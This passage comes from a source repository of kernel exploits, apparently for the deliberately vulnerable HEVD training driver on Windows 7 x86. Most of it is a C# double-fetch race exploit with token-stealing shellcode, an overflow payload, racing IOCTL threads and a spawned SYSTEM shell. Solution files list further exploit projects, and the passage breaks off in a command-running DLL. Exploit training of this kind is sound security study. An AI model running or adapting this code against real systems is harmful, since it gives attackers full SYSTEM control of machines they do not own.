    int nOutBufferSize,
    ref int pBytesReturned,
    IntPtr lpOverlapped);

// CreateProcess with the managed SECURITY_ATTRIBUTES / STARTUPINFO / PROCESS_INFORMATION
// mirrors declared above (see SpawnShell).
[DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Auto)]
static extern bool CreateProcess(
    string lpApplicationName,
    string lpCommandLine,
    ref SECURITY_ATTRIBUTES lpProcessAttributes,
    ref SECURITY_ATTRIBUTES lpThreadAttributes,
    bool bInheritHandles,
    uint dwCreationFlags,
    IntPtr lpEnvironment,
    string lpCurrentDirectory,
    ref STARTUPINFO lpStartupInfo,
    out PROCESS_INFORMATION lpProcessInformation);

// CloseHandle: returns false on failure; CleanUp reports the Win32 error in that case.
[DllImport("kernel32.dll", SetLastError=true)]
static extern bool CloseHandle(IntPtr hObject);

// WaitForSingleObject: the timeout is declared as int, so an infinite wait would have
// to be passed as -1; SpawnShell uses a 500 ms timeout.
[DllImport("kernel32.dll", SetLastError = true)]
static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
109 |
// Global variables — process-wide state shared, without any synchronisation, between
// Main and the two race threads (ThreadOverflow / ThreadSizeChange).
static IntPtr ShellcodeBuffer = IntPtr.Zero;          // page holding the token-stealing shellcode (allocated in Main)
static IntPtr PayloadBuffer = IntPtr.Zero;            // page holding the overflow payload: 0x820 filler bytes + shellcode pointer
static DOUBLE_FETCH DoubleFetch = new DOUBLE_FETCH(); // IOCTL input struct; Size is deliberately raced by ThreadSizeChange
static IntPtr hDevice = IntPtr.Zero;                  // driver device handle (presumably opened in Main); closed by CleanUp
115 |
116 | // Helper functions
// Closes the driver handle kept in hDevice, if one is open, and resets the field to
// IntPtr.Zero on success. On failure the handle is left as-is and the Win32 error
// code is printed. Always prints a progress line first.
static void CleanUp()
{
    Console.WriteLine("[>] Cleaning up handle object(s)");
    if (hDevice == IntPtr.Zero)
    {
        return; // nothing to release
    }

    bool closed = CloseHandle(hDevice);
    if (!closed)
    {
        Console.WriteLine("[!] Failed to close a kernel driver's handle (code={0})", Marshal.GetLastWin32Error());
        return;
    }

    hDevice = IntPtr.Zero;
}
132 |
// Returns true only on Windows 7 SP1 (NT 6.1, build 7601) running as x86. The
// shellcode in Main hard-codes kernel structure offsets for exactly that build, so any
// other OS is refused. Prints one status line in either case.
static bool IsWin7x86()
{
    string processorArch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");

    int major = 0;
    int minor = 0;
    int build = 0;
    RtlGetNtVersionNumbers(ref major, ref minor, ref build);
    build &= 0xFFFF; // the upper bits of the reported build number are not part of the build

    bool isWin7Sp1 = major == 6 && minor == 1 && build == 7601;
    bool isX86 = string.Equals(processorArch, "x86", StringComparison.OrdinalIgnoreCase);

    if (!(isWin7Sp1 && isX86))
    {
        Console.WriteLine("[-] Unsupported OS is detected");
        return false;
    }

    Console.WriteLine("[+] Windows 7 SP1 x86 is detected");
    return true;
}
154 |
// Returns true when the current process runs as the SYSTEM account (case-insensitive
// comparison of Environment.UserName). The race threads poll this as their
// "token swap has taken effect" signal.
static bool IsSystem()
{
    string currentUser = Environment.UserName;
    return string.Equals(currentUser, "SYSTEM", StringComparison.OrdinalIgnoreCase);
}
168 |
// Starts cmd.exe (fixed System32 path) in a new console with System32 as the working
// directory, waits up to 500 ms for it, closes the process and thread handles and
// returns CreateProcess's result. Prints the new PID on success or the Win32 error on
// failure. Closing the handles does not terminate the child.
// NOTE(review): si.cb is never set although the native API expects sizeof(STARTUPINFO);
// pSec/tSec carry only nLength (null descriptor, no handle inheritance).
static bool SpawnShell()
{
    string ApplicationName = "C:\\Windows\\System32\\cmd.exe";
    SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();
    SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES();
    uint CREATE_NEW_CONSOLE = 0x00000010;
    string CurrentDirectory = "C:\\Windows\\System32";
    STARTUPINFO si = new STARTUPINFO(); // cb left at 0 — see note above
    pSec.nLength = Marshal.SizeOf(pSec);
    tSec.nLength = Marshal.SizeOf(tSec);

    // lpCommandLine is null, so the executable is launched with no arguments.
    bool status = CreateProcess(
        ApplicationName, null, ref pSec, ref tSec, false,
        CREATE_NEW_CONSOLE, IntPtr.Zero, CurrentDirectory,
        ref si, out PROCESS_INFORMATION pi);

    if (status)
    {
        Console.WriteLine("[+] Shell is spawned successfully (PID = {0})", pi.dwProcessId);
        // 500 ms grace period only; the wait result is not inspected.
        WaitForSingleObject(pi.hProcess, 500);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
    else
    {
        Console.WriteLine("[!] Failed to spawn shell (code={0})", Marshal.GetLastWin32Error());
    }

    return status;
}
199 |
//// Thread function for sending payload
// Repeatedly issues IOCTL 0x222037 (its low two bits are 3, i.e. METHOD_NEITHER, so the
// driver accesses the user buffer directly) with DoubleFetch pointing at PayloadBuffer
// and Size = 0x200. ThreadSizeChange concurrently toggles DoubleFetch.Size, so the
// value the driver presumably validates and the value it later re-reads for the copy
// can differ — the TOCTOU this exploit depends on. A driver that captures the whole
// structure once (under __try/__except) before validating Size is not affected.
// Exits as soon as IsSystem() reports success or after 100000 attempts; each
// DeviceIoControl result is deliberately ignored since every iteration is best-effort.
static void ThreadOverflow()
{
    uint ioctl = 0x222037;
    DoubleFetch.Buffer = PayloadBuffer;
    DoubleFetch.Size = 0x200;
    int BytesReturned = 0;

    for (uint i = 0; i < 100000; i++)
    {
        if (IsSystem())
        {
            return;
        }
        // nInBufferSize is passed as 0 rather than Marshal.SizeOf(DoubleFetch) — presumably
        // not used by the driver for this IOCTL; confirm against the driver source.
        DeviceIoControl(hDevice, ioctl, ref DoubleFetch, 0, IntPtr.Zero, 0, ref BytesReturned, IntPtr.Zero);
    }
    return;
}
218 |
//// Thread function for modifying size parameter
// Busy-loops XOR-ing DoubleFetch.Size with 0xA24 so the field alternates between 0x200
// (the value ThreadOverflow sets) and 0x824, which is exactly the payload length Main
// prepares (0x820 filler bytes + a 4-byte pointer). No lock or volatile access is used
// on purpose: the unsynchronised write racing the kernel's reads is the whole point,
// which is also why Main insists on at least two CPUs. Same exit conditions as
// ThreadOverflow (IsSystem() or 100000 iterations).
static void ThreadSizeChange()
{
    for (uint i = 0; i < 100000; i++)
    {
        if (IsSystem())
        {
            return;
        }
        DoubleFetch.Size ^= 0xA24; // 0x200 <-> 0x824
    }
    return;
}
232 |
233 | // Main function
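// Entry point. Stages the token-stealing shellcode and the overflow payload,
// opens the HEVD device, then races two threads against the driver's double
// fetch of DoubleFetch.Size so that the second read sees an oversized length
// and the payload overflows the kernel stack buffer. Requires Windows 7 SP1
// x86 (IsWin7x86) and at least two logical CPUs, because the two threads must
// actually run concurrently for the race to be winnable.
//
// Changes from the original: the payload buffer is mapped PAGE_READWRITE
// instead of PAGE_EXECUTE_READWRITE (nothing executes from it), the
// misspelled FILE_FLAG_OVERWRAPPED local became FILE_FLAG_OVERLAPPED (same
// value), and the Win32 constants are now consts.
static void Main()
{
    // Token-stealing shellcode for Windows 7 SP1 x86. The offsets encoded in
    // it (fs:[0x124] KTHREAD, +0x50 EPROCESS, +0xF8 Token, +0xB8
    // ActiveProcessLinks, +0xB4 UniqueProcessId) are specific to that build,
    // which is why IsWin7x86() gates everything. The load into ebx is never
    // used afterwards (popad restores it). The trailing popad / pop ebp /
    // ret 8 is the recovery epilogue and must match the frame whose return
    // address is overwritten - verify against the HEVD build in use.
    byte[] shellcode = {
        //--[Setup]
        0x60,                                   // pushad
        0x64, 0xA1, 0x24, 0x01, 0x00, 0x00,     // mov eax, fs:[KTHREAD_OFFSET]
        0x8B, 0x40, 0x50,                       // mov eax, [eax + EPROCESS_OFFSET]
        0x89, 0xC1,                             // mov ecx, eax (current _EPROCESS)
        0x8B, 0x98, 0xF8, 0x00, 0x00, 0x00,     // mov ebx, [eax + TOKEN_OFFSET]
        //--[Copy System PID token]
        0xBA, 0x04, 0x00, 0x00, 0x00,           // mov edx, 4 (SYSTEM PID)
        0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00,     // mov eax, [eax + FLINK_OFFSET] <-|
        0x2D, 0xB8, 0x00, 0x00, 0x00,           // sub eax, FLINK_OFFSET            |
        0x39, 0x90, 0xB4, 0x00, 0x00, 0x00,     // cmp [eax + PID_OFFSET], edx      |
        0x75, 0xED,                             // jnz                            ->|
        0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00,     // mov edx, [eax + TOKEN_OFFSET]
        0x89, 0x91, 0xF8, 0x00, 0x00, 0x00,     // mov [ecx + TOKEN_OFFSET], edx
        //--[Recover]
        0x61,                                   // popad
        0x5D,                                   // pop ebp
        0xC2, 0x08, 0x00                        // ret 8
    };

    Console.WriteLine("--[ HEVD Exploitation : Double Fetch\n");

    if (!IsWin7x86())
    {
        return;
    }

    // The IOCTL thread and the size-flipping thread have to run on different
    // cores at the same time; on one CPU they would merely interleave.
    int cpuCount = Environment.ProcessorCount;
    Console.WriteLine("[>] Number of CPU: {0}", cpuCount);

    if (cpuCount < 2)
    {
        Console.WriteLine("[-] This exploit requires 2 CPUs");
        return;
    }
    Console.WriteLine("[>] CPU number requirement is satisfied");
    // NOTE(review): the two threads are not pinned to distinct cores. The
    // scheduler usually spreads them, but a per-thread affinity mask would
    // make the race more reliable on a busy machine.

    const uint ALLOC_SIZE = 0x1000;
    const uint MEM_COMMIT = 0x00001000;
    const uint MEM_RESERVE = 0x00002000;
    const uint PAGE_READWRITE = 0x04;
    const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Step 1: the shellcode page must be executable - the kernel returns
    // straight into this user-mode page, which only works because the target
    // does not enforce SMEP.
    Console.WriteLine("[>] Trying to allocate shellcode");
    ShellcodeBuffer = VirtualAlloc(IntPtr.Zero, ALLOC_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (ShellcodeBuffer == IntPtr.Zero)
    {
        Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
        return;
    }

    Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", ALLOC_SIZE, ShellcodeBuffer.ToString("X8"));
    Marshal.Copy(shellcode, 0, ShellcodeBuffer, shellcode.Length);
    Console.WriteLine("[+] Shellcode is allocated at 0x{0}", ShellcodeBuffer.ToString("X8"));

    // Step 2: payload = 0x820 bytes of filler up to the kernel pointer the
    // overflow clobbers (presumably the saved return address, given the
    // ret-based recovery epilogue), followed by the shellcode address. The
    // total, 0x824 bytes, is the oversized Size that ThreadSizeChange flips in.
    byte[] filler = Encoding.ASCII.GetBytes(new string('A', 0x820));
    byte[] shellcodeAddress = BitConverter.GetBytes(ShellcodeBuffer.ToInt32());
    byte[] payload = new byte[filler.Length + shellcodeAddress.Length];
    Array.Copy(filler, 0, payload, 0, filler.Length);
    Array.Copy(shellcodeAddress, 0, payload, filler.Length, shellcodeAddress.Length);

    Console.WriteLine("[>] Preparing payload");
    // Nothing executes from this page - the driver only copies its contents
    // into its own stack buffer - so PAGE_READWRITE is sufficient; the
    // original RWX mapping was unnecessary.
    PayloadBuffer = VirtualAlloc(IntPtr.Zero, ALLOC_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (PayloadBuffer == IntPtr.Zero)
    {
        Console.WriteLine("[-] Failed to VirtualAlloc (code={0})", Marshal.GetLastWin32Error());
        return;
    }

    Console.WriteLine("[+] Allocated {0} bytes buffer at 0x{1}", ALLOC_SIZE, PayloadBuffer.ToString("X8"));
    Marshal.Copy(payload, 0, PayloadBuffer, payload.Length);
    Console.WriteLine("[+] Payload is allocated at 0x{0}", PayloadBuffer.ToString("X8"));

    // Step 3: open the device.
    // NOTE(review): the handle is opened with FILE_FLAG_OVERLAPPED but
    // DeviceIoControl is later called with lpOverlapped = NULL, which the API
    // contract only guarantees for non-overlapped handles. It works with HEVD
    // in practice; the flag is not needed and could be dropped.
    string deviceName = "\\\\.\\HacksysExtremeVulnerableDriver";
    const uint GENERIC_READ = 0x80000000;
    const uint GENERIC_WRITE = 0x40000000;
    const uint FILE_SHARE_READ = 0x00000001;
    const uint FILE_SHARE_WRITE = 0x00000002;
    const uint OPEN_EXISTING = 0x3;
    const uint FILE_ATTRIBUTE_NORMAL = 0x80;
    const uint FILE_FLAG_OVERLAPPED = 0x40000000;
    IntPtr invalidHandle = new IntPtr(-1);   // INVALID_HANDLE_VALUE

    Console.WriteLine("[>] Opening {0}", deviceName);
    hDevice = CreateFile(
        deviceName, GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE, IntPtr.Zero,
        OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, IntPtr.Zero);

    if (hDevice == invalidHandle)
    {
        Console.WriteLine("[-] Failed to open {0} (code={1})", deviceName, Marshal.GetLastWin32Error());
        return;
    }

    Console.WriteLine("[+] HEVD.sys is opened succesfuly (hDevice = 0x{0})", hDevice.ToString("X"));

    // Step 4: run the race. ThreadOverflow keeps issuing the IOCTL with
    // Size = 0x200 while ThreadSizeChange XORs Size with 0xA24, flipping it
    // between 0x200 and 0x824 so the driver's second read of Size can see the
    // larger value. Both threads stop as soon as IsSystem() succeeds.
    Thread ioctlThread = new Thread(new ThreadStart(ThreadOverflow));
    Thread raceThread = new Thread(new ThreadStart(ThreadSizeChange));

    Console.WriteLine("[>] Triggering double fetch");
    ioctlThread.Start();
    raceThread.Start();
    ioctlThread.Join();
    raceThread.Join();
    CleanUp();

    // Step 5: only spawn a shell if the token swap is visible from here.
    if (IsSystem() && SpawnShell())
    {
        Console.WriteLine("[+] Exploit is completed successfully");
    }
    else
    {
        Console.WriteLine("[-] Failed to exploit");
    }
}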
359 | }
360 | }
--------------------------------------------------------------------------------
/HEVD_Win7x86/DoubleFetch/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
// Assembly identity for the DoubleFetch exploit project. Description,
// company and trademark are left at the template defaults (empty).
[assembly: AssemblyTitle("DoubleFetch")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("DoubleFetch")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
// Kept false: nothing in this console exploit is meant to be reachable via COM.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same GUID that identifies the DoubleFetch project in HEVD_Win7x86.sln.
[assembly: Guid("c3fded0a-dd87-4d37-99f5-1e679bd831ad")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// A fixed version (no '*') is used, so rebuilding does not change the assembly identity.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/HEVD_Win7x86.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31624.102
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StackOverflow", "StackOverflow\StackOverflow.csproj", "{F11DCD73-3213-4687-ADD0-198D6BFC225F}"
7 | EndProject
8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "StackOverflowGS", "StackOverflowGS\StackOverflowGS.csproj", "{47ED8C95-0E1B-43DE-9EC4-12505C263168}"
9 | EndProject
10 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DoubleFetch", "DoubleFetch\DoubleFetch.csproj", "{C3FDED0A-DD87-4D37-99F5-1E679BD831AD}"
11 | EndProject
12 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "NullPointerDereference", "NullPointerDereference\NullPointerDereference.csproj", "{F94165C3-2308-46DE-9D72-DC71C96E537A}"
13 | EndProject
14 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "IntegerOverflow", "IntegerOverflow\IntegerOverflow.csproj", "{22CE436A-76BF-46D8-B7DC-86330B55C523}"
15 | EndProject
16 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "TypeConfusion", "TypeConfusion\TypeConfusion.csproj", "{EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}"
17 | EndProject
18 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PoolOverflow", "PoolOverflow\PoolOverflow.csproj", "{48DA5A78-6F29-44D8-8366-E7017B2BFF14}"
19 | EndProject
20 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UseAfterFree", "UseAfterFree\UseAfterFree.csproj", "{22FAC2CB-DC33-4345-816E-1B0CAA429484}"
21 | EndProject
22 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UninitializedStackVariable", "UninitializedStackVariable\UninitializedStackVariable.csproj", "{D583FB11-8F46-410A-ABF3-45CE8C5966CA}"
23 | EndProject
24 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteWhatWhere", "WriteWhatWhere\WriteWhatWhere.csproj", "{24B73675-FD84-4DB4-9F28-F6FB085450C4}"
25 | EndProject
26 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteWhatWhereGDI", "WriteWhatWhereGDI\WriteWhatWhereGDI.csproj", "{FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}"
27 | EndProject
28 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WriteNull", "WriteNull\WriteNull.csproj", "{2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}"
29 | EndProject
30 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UninitializedHeapVariable", "UninitializedHeapVariable\UninitializedHeapVariable.csproj", "{8CF9A838-5690-4DA3-AE5D-8043CE1FA141}"
31 | EndProject
32 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "InjectLib", "InjectLib\InjectLib.vcxproj", "{7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}"
33 | EndProject
34 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "InsecureKernelResourceAccess", "InsecureKernelResourceAccess\InsecureKernelResourceAccess.csproj", "{A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}"
35 | EndProject
36 | Global
37 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
38 | Debug|x86 = Debug|x86
39 | Release|x86 = Release|x86
40 | EndGlobalSection
41 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
42 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Debug|x86.ActiveCfg = Debug|x86
43 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Debug|x86.Build.0 = Debug|x86
44 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Release|x86.ActiveCfg = Release|x86
45 | {F11DCD73-3213-4687-ADD0-198D6BFC225F}.Release|x86.Build.0 = Release|x86
46 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Debug|x86.ActiveCfg = Debug|x86
47 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Debug|x86.Build.0 = Debug|x86
48 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Release|x86.ActiveCfg = Release|x86
49 | {47ED8C95-0E1B-43DE-9EC4-12505C263168}.Release|x86.Build.0 = Release|x86
50 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Debug|x86.ActiveCfg = Debug|x86
51 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Debug|x86.Build.0 = Debug|x86
52 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Release|x86.ActiveCfg = Release|x86
53 | {C3FDED0A-DD87-4D37-99F5-1E679BD831AD}.Release|x86.Build.0 = Release|x86
54 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Debug|x86.ActiveCfg = Debug|x86
55 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Debug|x86.Build.0 = Debug|x86
56 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Release|x86.ActiveCfg = Release|x86
57 | {F94165C3-2308-46DE-9D72-DC71C96E537A}.Release|x86.Build.0 = Release|x86
58 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Debug|x86.ActiveCfg = Debug|x86
59 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Debug|x86.Build.0 = Debug|x86
60 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Release|x86.ActiveCfg = Release|x86
61 | {22CE436A-76BF-46D8-B7DC-86330B55C523}.Release|x86.Build.0 = Release|x86
62 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Debug|x86.ActiveCfg = Debug|x86
63 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Debug|x86.Build.0 = Debug|x86
64 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Release|x86.ActiveCfg = Release|x86
65 | {EC2F5921-ACA8-4F8F-AF6A-F238E0AA61DD}.Release|x86.Build.0 = Release|x86
66 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Debug|x86.ActiveCfg = Debug|x86
67 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Debug|x86.Build.0 = Debug|x86
68 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Release|x86.ActiveCfg = Release|x86
69 | {48DA5A78-6F29-44D8-8366-E7017B2BFF14}.Release|x86.Build.0 = Release|x86
70 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Debug|x86.ActiveCfg = Debug|x86
71 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Debug|x86.Build.0 = Debug|x86
72 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Release|x86.ActiveCfg = Release|x86
73 | {22FAC2CB-DC33-4345-816E-1B0CAA429484}.Release|x86.Build.0 = Release|x86
74 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Debug|x86.ActiveCfg = Debug|x86
75 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Debug|x86.Build.0 = Debug|x86
76 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Release|x86.ActiveCfg = Release|x86
77 | {D583FB11-8F46-410A-ABF3-45CE8C5966CA}.Release|x86.Build.0 = Release|x86
78 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Debug|x86.ActiveCfg = Debug|x86
79 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Debug|x86.Build.0 = Debug|x86
80 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Release|x86.ActiveCfg = Release|x86
81 | {24B73675-FD84-4DB4-9F28-F6FB085450C4}.Release|x86.Build.0 = Release|x86
82 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Debug|x86.ActiveCfg = Debug|x86
83 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Debug|x86.Build.0 = Debug|x86
84 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Release|x86.ActiveCfg = Release|x86
85 | {FDD121CE-E7EC-4ED4-909C-7B4191B0D6A5}.Release|x86.Build.0 = Release|x86
86 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Debug|x86.ActiveCfg = Debug|x86
87 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Debug|x86.Build.0 = Debug|x86
88 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Release|x86.ActiveCfg = Release|x86
89 | {2BBA4088-90C0-48E7-B68B-205BF5FD1E7E}.Release|x86.Build.0 = Release|x86
90 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Debug|x86.ActiveCfg = Debug|x86
91 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Debug|x86.Build.0 = Debug|x86
92 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Release|x86.ActiveCfg = Release|x86
93 | {8CF9A838-5690-4DA3-AE5D-8043CE1FA141}.Release|x86.Build.0 = Release|x86
94 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Debug|x86.ActiveCfg = Debug|Win32
95 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Debug|x86.Build.0 = Debug|Win32
96 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Release|x86.ActiveCfg = Release|Win32
97 | {7D0A2423-B3E8-4E03-9CD9-38F31FD022B0}.Release|x86.Build.0 = Release|Win32
98 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Debug|x86.ActiveCfg = Debug|x86
99 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Debug|x86.Build.0 = Debug|x86
100 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Release|x86.ActiveCfg = Release|x86
101 | {A3AFFC5E-B6FF-42AC-8EA0-7AFDA96EA3F1}.Release|x86.Build.0 = Release|x86
102 | EndGlobalSection
103 | GlobalSection(SolutionProperties) = preSolution
104 | HideSolutionNode = FALSE
105 | EndGlobalSection
106 | GlobalSection(ExtensibilityGlobals) = postSolution
107 | SolutionGuid = {C78CEAD1-4736-446E-BBA4-A6F4B96DAC71}
108 | EndGlobalSection
109 | EndGlobal
110 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 |
14 | 16.0
15 | Win32Proj
16 | {7d0a2423-b3e8-4e03-9cd9-38f31fd022b0}
17 | InjectLib
18 | 10.0
19 |
20 |
21 |
22 | DynamicLibrary
23 | true
24 | v142
25 | Unicode
26 |
27 |
28 | DynamicLibrary
29 | false
30 | v142
31 | true
32 | Unicode
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 | true
48 | $(SolutionDir)bin\x86\$(Configuration)\
49 |
50 |
51 | false
52 | $(SolutionDir)bin\x86\$(Configuration)\
53 |
54 |
55 |
56 | Level3
57 | true
58 | WIN32;_DEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
59 | true
60 | Use
61 | pch.h
62 |
63 |
64 | Windows
65 | true
66 | false
67 |
68 |
69 |
70 |
71 | Level3
72 | true
73 | true
74 | true
75 | WIN32;NDEBUG;INJECTLIB_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)
76 | true
77 | Use
78 | pch.h
79 |
80 |
81 | Windows
82 | true
83 | true
84 | true
85 | false
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 | Create
96 | Create
97 |
98 |
99 |
100 |
101 |
102 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/InjectLib.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/HEVD_Win7x86/InjectLib/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 |
3 | extern "C" {
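// Runs `cmd` through CreateProcess in a new console with
// C:\Windows\System32 as the working directory and blocks until the child
// exits. Returns the CreateProcess result: FALSE on failure, with the reason
// available from GetLastError().
//
// `cmd` must be a writable buffer - CreateProcessW may modify the command
// line in place - which is why callers pass wchar_t arrays, not literals.
// lpApplicationName is NULL, so the executable is taken from the first token
// of `cmd`; callers should use a fully qualified path (the ones in DllMain
// do) so the search path cannot be hijacked.
//
// Changes from the original: a NULL `cmd` is rejected up front instead of
// being passed to CreateProcess, and the wait uses INFINITE rather than a
// bare -1 (identical value, explicit intent).
__declspec(dllexport) BOOL ExecuteCommand(wchar_t cmd[])
{
    if (cmd == NULL)
    {
        ::SetLastError(ERROR_INVALID_PARAMETER);
        return FALSE;
    }

    wchar_t workingDirectory[] = L"C:\\Windows\\System32";
    STARTUPINFO startupInfo = {};
    PROCESS_INFORMATION processInfo = {};
    startupInfo.cb = sizeof(startupInfo);   // required by CreateProcess

    BOOL created = ::CreateProcess(
        NULL,               // lpApplicationName: resolve from the command line
        cmd,                // mutable command line
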